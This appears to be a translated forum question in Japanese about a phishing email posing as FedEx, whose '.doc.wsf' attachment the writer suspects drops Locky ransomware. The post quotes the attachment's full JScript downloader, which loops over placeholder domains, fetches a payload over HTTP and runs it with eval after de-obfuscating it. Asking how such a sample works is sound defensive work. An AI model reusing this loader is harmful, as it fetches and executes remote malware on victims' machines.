0
「FedExパッケージを配送できませんでした。最近添付された.doc添付ファイルを開封してください。私は最近、オンラインでものを注文していたので、私は明らかにばかげているので、添付ファイルをクリックして開いた。幸運にも私はLinuxを使っていたので、 "filename.doc.wsf"を開いても害はありませんでした。しかし、それに含まれている以下のスニペットが何をしようとしているのかが不思議に思う。以下の.wsf電子メールによる攻撃は正確に何をしようとしていますか?
私のグーグルによると、最終的な目標は、WindowsシステムにLockyというマルウェアをインストールすることです。マルウェアがダウンロードしようとしているさまざまなドメインは配列x []にリストされており、for-loopの最初の数行はスニペットからURL全体を構成しているようです。 (私はそれがスパム検出を避けるために分解されたと仮定していると仮定します)。しかし、 "試し"から始まって、私は何が起こっているのかをかなり追跡できません。
<job><script language=JScript>
var x = new Array("DOMAIN1.com","DOMAIN2.ru","ftp.DOMAIN3.com","DOMAIN4.ru","DOMAIN5.com");
var y = "Msxml2.XMLHTTP";
for (var i=0; i<5; i++)
{
x[i] = "http://" + x[i];
x[i] += "/co";
x[i] += "unter/";
x[i] += "?a=0.34960858&i=rRMDdRYvgD1oBqvgMjMaHDglAgtoQ1d6_hYJEPEXmzddhBr8QbsIrfboGHt9FZlWF53OH-6Q8M45bw";
try {
var z = new ActiveXObject(y);
z.open("GET", x[i], false);
z.send();
if (z.status == 200)
{
eval(z.responseText.split("~").join("a"));
break;
};
}
catch(e) { };
};
</script></job>